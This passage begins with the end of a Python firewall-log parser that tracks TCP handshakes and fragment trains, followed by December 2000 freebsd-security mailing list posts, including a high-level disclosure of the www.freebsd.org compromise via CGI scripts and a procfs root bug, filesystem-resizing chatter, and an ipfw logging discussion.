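    trains = defaultdict(list)
    for r in records:
        if r["frag_offset"] is not None and "ip_id" in r:
            trains[(r["src"], r["dst"], r["ip_id"])].append(r)
    return {key: {"offsets": sorted(f["frag_offset"] for f in frags),
                  "both_ends_seen": (any(f["frag_offset"] == 0 for f in frags)
                                     and any(not f["more_frags"] for f in frags))}
            for key, frags in trains.items()}


if __name__ == "__main__":
    recs = parse_log(SAMPLE)
    for conn, state in track_handshakes(recs).items():
        print(conn, state)
    for key, info in fragment_trains(recs).items():
        print(key, info)
```

A connection left in state "syn" is a SYN that was logged but never answered and acknowledged, which standard logging cannot distinguish from an established session.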
From: Josef Karthauser To: Eivind Eklund Cc: sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214090633.B4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <19990316104827.C3196@bitbox.follo.net>; from eivind@FreeBSD.ORG on Tue, Mar 16, 1999 at 10:48:28AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > > > > There is already a program available that can do most of the job, see > > > > http://www.nethelp.no/scsi/fsresize.c > > > > (No I didn't write it.) It gets the cylinder group summary information > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > using such a system until it got *everything* right... > > According to the author (der Mouse), there are more things it gets > wrong. As far as I understood, he doesn't distribute it except to > people that want it as a basis for further hacking, as it sometimes > eats filesystems. Or get a copy of growfs and ffsinfo from the head branch. They were committed to FreeBSD last week. Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1: 7: 6 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:07:03 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id D641137B404; Thu, 14 Dec 2000 01:07:02 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id 8A9709B39; Thu, 14 Dec 2000 09:07:19 +0000 (GMT) Date: Thu, 14 Dec 2000 09:07:19 +0000 
From: Josef Karthauser To: Eivind Eklund Cc: sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214090719.C4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <19990316104827.C3196@bitbox.follo.net>; from eivind@FreeBSD.ORG on Tue, Mar 16, 1999 at 10:48:28AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > On Tue, Mar 16, 1999 at 08:48:32AM +0100, sthaug@nethelp.no wrote: > > > It was a joke, and I'll never carry on such a job... I'd rather attack to > > > monstrous task of resizing existing filesystems!!! Thing which I would > > > obviously not be able to accomplish... :) > > > > There is already a program available that can do most of the job, see > > > > http://www.nethelp.no/scsi/fsresize.c > > > > (No I didn't write it.) It gets the cylinder group summary information > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > using such a system until it got *everything* right... > > According to the author (der Mouse), there are more things it gets > wrong. As far as I understood, he doesn't distribute it except to > people that want it as a basis for further hacking, as it sometimes > eats filesystems. 
Whoops, this is a _really_ only mail isn't it! :) Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1:11:30 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:11:26 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id BEC7D37B400; Thu, 14 Dec 2000 01:11:25 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id E63059B38; Thu, 14 Dec 2000 09:11:40 +0000 (GMT) Date: Thu, 14 Dec 2000 09:11:40 +0000 
From: Josef Karthauser To: Josef Karthauser Cc: Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214091140.D4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> <20001214090719.C4186@bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001214090719.C4186@bsdi.com>; from joe@tao.org.uk on Thu, Dec 14, 2000 at 09:07:19AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 09:07:19AM +0000, Josef Karthauser wrote: > On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > > On Tue, Mar 16, 1999 at 08:48:32AM +0100, sthaug@nethelp.no wrote: > > > > It was a joke, and I'll never carry on such a job... I'd rather attack to > > > > monstrous task of resizing existing filesystems!!! Thing which I would > > > > obviously not be able to accomplish... :) > > > > > > There is already a program available that can do most of the job, see > > > > > > http://www.nethelp.no/scsi/fsresize.c > > > > > > (No I didn't write it.) It gets the cylinder group summary information > > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > > using such a system until it got *everything* right... > > > > According to the author (der Mouse), there are more things it gets > > wrong. 
As far as I understood, he doesn't distribute it except to > > people that want it as a basis for further hacking, as it sometimes > > eats filesystems. > > Whoops, this is a _really_ only mail isn't it! :) [slap] I meant "old" not "only". That's what happens when I forget to have coffee before replying to mail. This one had been in my mailbox for 18 months because it had a URL of interest in it. Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 7: 5:34 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:05:31 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 7812737B400 for ; Thu, 14 Dec 2000 07:05:31 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id HAA25459 for security@freebsd.org; Thu, 14 Dec 2000 07:06:49 -0800 Date: Thu, 14 Dec 2000 07:06:49 -0800 
From: Kris Kennaway To: security@freebsd.org Subject: Details of www.freebsd.org penetration Message-ID: <20001214070649.A25429@citusc.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mP3DRpeJDSE+ciuQ" Content-Disposition: inline User-Agent: Mutt/1.2i Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline As promised, here are the details of the recent penetration of the www.freebsd.org server. As several people guessed, the initial penetration involved weaknesses in the CGI scripts running on the website. This gained control of user nobody, and then a local root vulnerability was leveraged to gain root access to the machine. As far as we could tell, the attackers' only action was to plant a greeting on the main webpage. They contacted the security-officer immediately describing the entry mechanism and the extent of their activities, and while we do not believe any further malicious activity was carried out, various protective measures were taken to sanitize the compromised system, including an audit for all known security holes and a complete system upgrade. The www cgi scripts have since been audited by several people for other vulnerabilities, four of which were found and corrected (I don't have the exact details to hand). All involved input validation errors which allowed a remote user to execute commands as the user running the cgi scripts (user nobody). There is still further work which is being done on the cgi scripts to ensure greater safety (e.g. use of perl's taint mode), but the auditors believe the problems have been fixed. There are also other changes planned to improve the security of machines in the freebsd.org cluster against future penetration attempts. 
It's my understanding that none of the www.freebsd.org mirrors use the CGI scripts, therefore this vulnerability is likely limited to the one main server - but if anyone else has adapted freebsd CGI scripts for their own purposes they are advised to catch up with recent changes. Since the website contents are not a supported FreeBSD product an advisory is not planned for these vulnerabilities. Sorry for taking longer than promised to send this mail. I am currently suffering under very reduced connectivity while back home in Australia for the holidays. Thanks for everyone's patience. Kris Kennaway FreeBSD Security Officer --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline --mP3DRpeJDSE+ciuQ-- From owner-freebsd-security Thu Dec 14 7:48:45 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:48:43 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id 8386E37B400; Thu, 14 Dec 2000 07:48:43 -0800 (PST) Received: from x86w2kl1 - 209.0.249.169 by email.msn.com with Microsoft SMTPSVC; Thu, 14 Dec 2000 07:48:42 -0800 Message-ID: <00c401c0666c$1f63cff0$9207c00a@local>
From: "John Howie" To: "Kris Kennaway" , References: <20001214070649.A25429@citusc.usc.edu> Subject: Re: Details of www.freebsd.org penetration Date: Fri, 15 Dec 2000 07:53:32 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris, Any chance you could let us know exactly what 'local root vulnerability' was exploited. As I recall it was originally stated that no weakness in FreeBSD itself had been leveraged. I appreciate that the hacker gained access to the system via CGI (and not a FreeBSD weakness) but once in he/she became root through some other means. Was this vulnerability a configuration issue or simply a known problem that had not been addressed? Thanks, john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 7:59:14 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:59:13 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ns.shawneelink.net (ns.shawneelink.net [216.240.66.11]) by hub.freebsd.org (Postfix) with ESMTP id DE4DD37B400 for ; Thu, 14 Dec 2000 07:59:12 -0800 (PST) Received: from ns.shawneelink.net (ns.shawneelink.net [216.240.66.11]) by ns.shawneelink.net (8.10.1/8.10.1) with ESMTP id eBEFx7I06881 for ; Thu, 14 Dec 2000 09:59:07 -0600 (CST) Date: Thu, 14 Dec 2000 09:59:07 -0600 (CST) 
From: J Bacher X-Sender: jb@ns.shawneelink.net To: security@FreeBSD.ORG Subject: Re: Details of www.freebsd.org penetration In-Reply-To: <20001214070649.A25429@citusc.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Dec 2000, Kris Kennaway wrote: > As promised, here are the details of the recent penetration of the > www.freebsd.org server. > > As several people guessed, the initial penetration involved weaknesses > in the CGI scripts running on the website. This gained control of user > nobody, and then a local root vulnerability was leveraged to gain root > access to the machine. > [stuff deleted] > The www cgi scripts have since been audited by several people for > other vulnerabilities, four of which were found and corrected (I don't This brings up an excellent point. It would be great if I could out-source the responsibility of reviewing [and optionally correcting] C or Perl code prior to making it available to webserver customers. Is there a centralized source of {reputable, qualified} individuals that provide this service? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 8: 9: 6 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 08:09:03 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from cam067213.student.utwente.nl (cam067213.student.utwente.nl [130.89.226.203]) by hub.freebsd.org (Postfix) with SMTP id 0A54437B400 for ; Thu, 14 Dec 2000 08:09:03 -0800 (PST) Received: (qmail 43341 invoked by uid 1001); 14 Dec 2000 17:10:57 -0000 Date: Thu, 14 Dec 2000 17:10:57 +0000 
From: Frank van Vliet
To: freebsd-security@freebsd.org
Subject: Re: Details of www.freebsd.org penetration
Message-ID: <20001214171057.A43310@root66.org>
References: <20001214070649.A25429@citusc.usc.edu> <00c401c0666c$1f63cff0$9207c00a@local>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="pf9I7BMVVzbSWLtt"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00c401c0666c$1f63cff0$9207c00a@local>; from JHowie@msn.com on Fri, Dec 15, 2000 at 07:53:32AM -0000
Sender: karin@cam067213.student.utwente.nl
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--pf9I7BMVVzbSWLtt
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote:
> Any chance you could let us know exactly what 'local root vulnerability' was
> exploited. As I recall it was originally stated that no weakness in FreeBSD
> itself had been leveraged. I appreciate that the hacker gained access to the
> system via CGI (and not a FreeBSD weakness) but once in he/she became root
> through some other means. Was this vulnerability a configuration issue or
> simply a known problem that had not been addressed?

Although we normally only use weaknesses created by the server admins themselves,
like cgi scripts made by them and configurations, this time local root was
gained by a local root exploit which was an 'error' of freebsd itself.
Advisory about it was promised to be sent weeks ago, it is fixed in FreeBSD 4.2

Kris, this would be a nice timing for that advisory?
Frank van Vliet alias {} Joost Pol alias nohican -- RooT66: http://root66.student.utwente.nl PGP Public Key: http://root66.student.utwente.nl/frank.pub.pgp --pf9I7BMVVzbSWLtt Content-Type: application/pgp-signature Content-Disposition: inline --pf9I7BMVVzbSWLtt-- From owner-freebsd-security Thu Dec 14 8:26:59 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 08:26:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 5268237B400 for ; Thu, 14 Dec 2000 08:26:57 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id IAA26051; Thu, 14 Dec 2000 08:28:14 -0800 Date: Thu, 14 Dec 2000 08:28:14 -0800
From: Kris Kennaway
To: John Howie
Cc: security@freebsd.org
Subject: procfs vulnerability (Re: Details of www.freebsd.org penetration)
Message-ID: <20001214082814.A25963@citusc.usc.edu>
References: <20001214070649.A25429@citusc.usc.edu> <00c401c0666c$1f63cff0$9207c00a@local>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ZGiS0Q5IWpPtfppv"
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <00c401c0666c$1f63cff0$9207c00a@local>; from JHowie@msn.com on Fri, Dec 15, 2000 at 07:53:32AM -0000
Sender: kris@citusc.usc.edu
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--ZGiS0Q5IWpPtfppv
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote:
> Kris,
>
> Any chance you could let us know exactly what 'local root vulnerability' was
> exploited. As I recall it was originally stated that no weakness in FreeBSD
> itself had been leveraged. I appreciate that the hacker gained access to the

No, I said that it was not a vulnerability in FreeBSD which allowed
the initial penetration. The attackers wouldn't have been able to get
in if this was any old FreeBSD system that wasn't running dodgy CGI
scripts.

> system via CGI (and not a FreeBSD weakness) but once in he/she became root
> through some other means. Was this vulnerability a configuration issue or
> simply a known problem that had not been addressed?

The latter :-( In fact it was a problem which was brought to our
attention a few days prior by the same guys who did the penetration -
unfortunately it's taken us rather longer than I would have liked to
get it fixed and an advisory released, a combination of the people
involved being busy travelling, or just busy. However we've finally
got it all together, it seems, and so an advisory should be out on
Monday.
If I'd known how long it would take to get the problem fixed I would have released details informally before now - I can only apologise for the delay, although to my knowledge this vulnerability is not yet widely known - basically there are several local root exploits in procfs: wait for the advisory for more details, unmount procfs now on your multi-user systems. Kris --ZGiS0Q5IWpPtfppv Content-Type: application/pgp-signature Content-Disposition: inline --ZGiS0Q5IWpPtfppv-- From owner-freebsd-security Thu Dec 14 12: 8:12 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 12:08:10 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from s2-c2.cnmnetwork.com (s2-c2.cnmnetwork.com [209.163.64.72]) by hub.freebsd.org (Postfix) with SMTP id 2EA6337B400 for ; Thu, 14 Dec 2000 12:08:10 -0800 (PST) Received: (qmail 21467 invoked from network); 14 Dec 2000 12:06:44 -0800 Received: from prometheus.cnmnetwork.com (HELO compton) (irc@209.79.28.5) by s2-c2.cnmnetwork.com with SMTP; 14 Dec 2000 12:06:44 -0800 Date: Thu, 14 Dec 2000 12:21:06 -0800 (PST)
From: jrz Reply-To: jrz Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) To: security@FreeBSD.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: Q6wHG/XziiQ7dh5fuW6rkA== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4 SunOS 5.8 i86pc i386 Message-Id: <20001214200810.2EA6337B400@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >unmount procfs now on >your multi-user systems. > >Kris Kris, What versions of FreeBSD is this affecting at this time? -jrz --- Jacob Zehnder | Systems Engineer CNM Network | http://www.cnmnetwork.com business: jrz@cnmnetwork.com other: jrz@rackmount.org --- "Where am I, and what am I doing in this handbasket?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 12:16:13 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 12:16:11 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 7A7F837B400 for ; Thu, 14 Dec 2000 12:16:10 -0800 (PST) Received: (qmail 28600 invoked by uid 0); 14 Dec 2000 20:16:08 -0000 Received: from p3ee2161f.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.31) by mail.gmx.net (mail06) with SMTP; 14 Dec 2000 20:16:08 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA09885 for freebsd-security@freebsd.org; Thu, 14 Dec 2000 20:58:54 +0100 Date: Thu, 14 Dec 2000 20:58:54 +0100 
From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: Extended ipfw Logging Message-ID: <20001214205854.J253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <20001214003219.K96105@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001214003219.K96105@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Thu, Dec 14, 2000 at 12:32:19AM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, Dec 14, 2000 at 00:32 -0800, Crist J. Clark wrote:
>
> INTRODUCTION
>
> I wanted to add some detail to the ipfw logging. Specifically,
> I wanted TCP flags. However, once I started coding, I decided
> why not toss just about every field of interest in. I have
> attached patches.
>
>
> WHAT THE PATCHES DO
>
> There are new fields for all packets. Data from the IP header,
> the IP ID, TTL, and extra fragmentation information is printed
> for all types of datagrams. TCP packets include additional
> information on sequence number, acknowledgement number, and
> flags.

Why not have the "verbosity" written in the matching rule? One surely doesn't want to bloat *all* logged entries (not even log all denials, and maybe log some accepted packets too). Expand the filter description for the log verbosity level and reference this field when the match is meant to log something.

I'm not saying that ipf(4) is the cure for everything. But looking at "man 5 ipf" here's what I really like about it and you might, too:

log = "log" [ "body" ] [ "first" ] [ "or-block" ] [ "level" loglevel ] .

Although the above "loglevel" is different from your verbosity idea (it's a syslog facility.level pair) you might want to have the best of both worlds in ipfw(4) and code syslog levels as well as your verbosity controlling what packet characteristics to print out and where to do so?
:) virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 13: 7:31 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 13:07:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 36E9237B402 for ; Thu, 14 Dec 2000 13:07:28 -0800 (PST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id eBEL8GP59074; Thu, 14 Dec 2000 15:08:16 -0600 (CST) Date: Thu, 14 Dec 2000 15:08:16 -0600 (CST) 
From: Alex Charalabidis To: jrz Cc: security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) In-Reply-To: <20001214200810.2EA6337B400@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Dec 2000, jrz wrote: > >unmount procfs now on > >your multi-user systems. > > > >Kris > > Kris, > > What versions of FreeBSD is this affecting at this time? > Jake, I'm going by the assumption that this is at least 4.x and probably 3.x too. That's what we expect the advisory to tell us, let him get the data together. We don't want him making any hasty announcements here under pressure and then posting something else in the advisory. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 13:10:26 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 13:10:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 5C62937B698; Thu, 14 Dec 2000 13:10:21 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA17576; Thu, 14 Dec 2000 13:10:11 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17570; Thu Dec 14 13:10:04 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEL9xS10091; Thu, 14 Dec 2000 13:09:59 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" 
via SMTP by passer9.cwsent.com, id smtpdW10081; Thu Dec 14 13:09:00 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBEL8wo04627; Thu, 14 Dec 2000 13:08:58 -0800 (PST) Message-Id: <200012142108.eBEL8wo04627@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdqQ4623; Thu Dec 14 13:08:47 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.2-RELEASE X-Sender: cy To: Kris Kennaway Cc: John Howie , security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) In-reply-to: Your message of "Thu, 14 Dec 2000 08:28:14 PST." <20001214082814.A25963@citusc.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 14 Dec 2000 13:08:47 -0800 Sender: cy@uumail.gov.bc.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message <20001214082814.A25963@citusc.usc.edu>, Kris Kennaway writes:
>
> --ZGiS0Q5IWpPtfppv
> Content-Type: text/plain; charset=us-ascii
> Content-Disposition: inline
> Content-Transfer-Encoding: quoted-printable
>
> On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote:
> > Kris,
> >
> > Any chance you could let us know exactly what 'local root vulnerability' was
> > exploited. As I recall it was originally stated that no weakness in FreeBSD
> > itself had been leveraged. I appreciate that the hacker gained access to the
>
> No, I said that it was not a vulnerability in FreeBSD which allowed
> the initial penetration. The attackers wouldn't have been able to get
> in if this was any old FreeBSD system that wasn't running dodgy CGI
> scripts.
>
> > system via CGI (and not a FreeBSD weakness) but once in he/she became root
> > through some other means. Was this vulnerability a configuration issue or
> > simply a known problem that had not been addressed?
>
> The latter :-( In fact it was a problem which was brought to our
> attention a few days prior by the same guys who did the penetration -
> unfortunately it's taken us rather longer than I would have liked to
> get it fixed and an advisory released, a combination of the people
> involved being busy travelling, or just busy. However we've finally
> got it all together, it seems, and so an advisory should be out on
> Monday.

Has the fix been committed?
If so, is it procfs_ctl.c 1.22? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 14:52:14 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 14:52:11 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from joe.halenet.com.au (joe.halenet.com.au [203.37.141.114]) by hub.freebsd.org (Postfix) with ESMTP id 9D4D437B402 for ; Thu, 14 Dec 2000 14:52:09 -0800 (PST) Received: from temp19 (modem-113-st.halenet.com.au [203.55.33.113]) by joe.halenet.com.au (8.9.1/8.9.1) with SMTP id GAA02778 for ; Fri, 15 Dec 2000 06:47:06 +1000 (EST) (envelope-from timbo@halenet.com.au) Message-ID: <012701c06620$e3f450c0$6500a8c0@halenet.com.au> 
From: "Tim McCullagh" To: Subject: OT Spamming on this list of late Date: Fri, 15 Dec 2000 08:54:52 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi All,

Of late there has been a degree of spamming using this and other FreeBSD lists. There has also been some discussion on how to prevent it.

I just saw this at the bottom of an email that was sent to me

>>>>>>>>>>
NOTICE: By sending unsolicited commercial advertising/solicitations (or otherwise on or as part of a mailing list) to the above e-mail address you will be indicating your consent to paying Danick Systems a Limited Liability Corporation and controller of this domain $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent dealing with it. Payment due in 30 days upon receipt of an invoice (e-mail or regular mail) from me or my authorized representative.
<<<<<<<<<<<

